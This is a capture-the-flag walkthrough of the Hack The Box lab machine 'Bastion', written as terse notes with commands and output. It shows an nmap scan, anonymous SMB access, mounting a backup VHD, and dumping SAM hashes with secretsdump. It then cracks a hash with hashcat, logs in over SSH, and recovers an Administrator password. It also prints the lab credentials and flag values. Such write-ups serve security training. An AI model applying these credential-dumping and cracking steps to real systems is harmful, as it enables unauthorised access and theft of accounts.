Bastion - 01.08.2021


NMap

┌──(kali㉿kali-os)-[~/htb/bastion]                                                                          
└─$ nmap -sC -sV -oA nmap 10.10.10.134                                                                                                                                                                                                      
PORT      STATE SERVICE      VERSION                                                                                  
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)                                                   
| ssh-hostkey:                                                                                                        
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)                                                        
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)                                                       
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)                                                     
135/tcp   open  msrpc        Microsoft Windows RPC                                                                    
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn                                                            
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds                                          
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                  
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                           
|_http-title: Not Found                                                                                               
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                  
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                           
|_http-title: Not Found                                                                                               
49664/tcp open  msrpc        Microsoft Windows RPC                                                                    
49665/tcp open  msrpc        Microsoft Windows RPC                                                                    
49666/tcp open  msrpc        Microsoft Windows RPC                                                                    
49667/tcp open  msrpc        Microsoft Windows RPC                                                                    
49668/tcp open  msrpc        Microsoft Windows RPC                                                                    
49669/tcp open  msrpc        Microsoft Windows RPC                                                                    
49670/tcp open  msrpc        Microsoft Windows RPC

Host script results:
|_clock-skew: mean: -26m51s, deviation: 1h09m14s, median: 13m06s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-08-01T00:19:26+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-31T22:19:24
|_  start_date: 2021-07-31T19:34:26

Samba

Attempt to list the Samba shares. The Backups share looks interesting.

┌──(kali㉿kali-os)-[~/htb/bastion]
└─$ smbclient -N -L //10.10.10.134

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

smbclient -N //10.10.10.134/Backups

note.txt:

Sysadmins: please don’t transfer the entire backup file locally, the VPN to the subsidiary office is too slow.


Another way (BETTER)

Mounting with mount onto the local machine

mount -t cifs //10.10.10.134/Backups /mnt/samba-bastion/

Mounting the vhd file at /mnt/back

guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/back/

Copying the SAM/SYSTEM files to Linux

┌──(kali㉿kali-os)-[/mnt]
└─$ sudo cp backup/Windows/System32/config/SAM ~/htb/bastion 
                                                                                                                     
┌──(kali㉿kali-os)-[/mnt]
└─$ sudo cp backup/Windows/System32/config/SYSTEM ~/htb/bastion

Using secretsdump locally to read the user hashes

┌──(kali㉿kali-os)-[~/htb/bastion]
└─$ secretsdump.py -sam SAM -system SYSTEM local
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...

Evil-WinRM directly with the hashes does not work


Hashcat

hashcat -m 1000 --user hashes /usr/share/wordlists/rockyou.txt

L4mpje:bureaulampje

ssh with these credentials worked

user.txt

9bfe57d5c3309db3a151772f9d86c6cd


Priv Esc

Enumeration attempt with PowerUp.ps1

Unfortunately poor

Import-Module C:\Windows\temp\aa\power.ps1
Invoke-AllChecks
ModifiablePath    : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps
IdentityReference : BASTION\L4mpje
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw

Administrator:thXLHM96BeKL0ER2

ssh administrator@10.10.10.134

SSH connection worked

root.txt

958850b91811676ed6620a9c430e65c8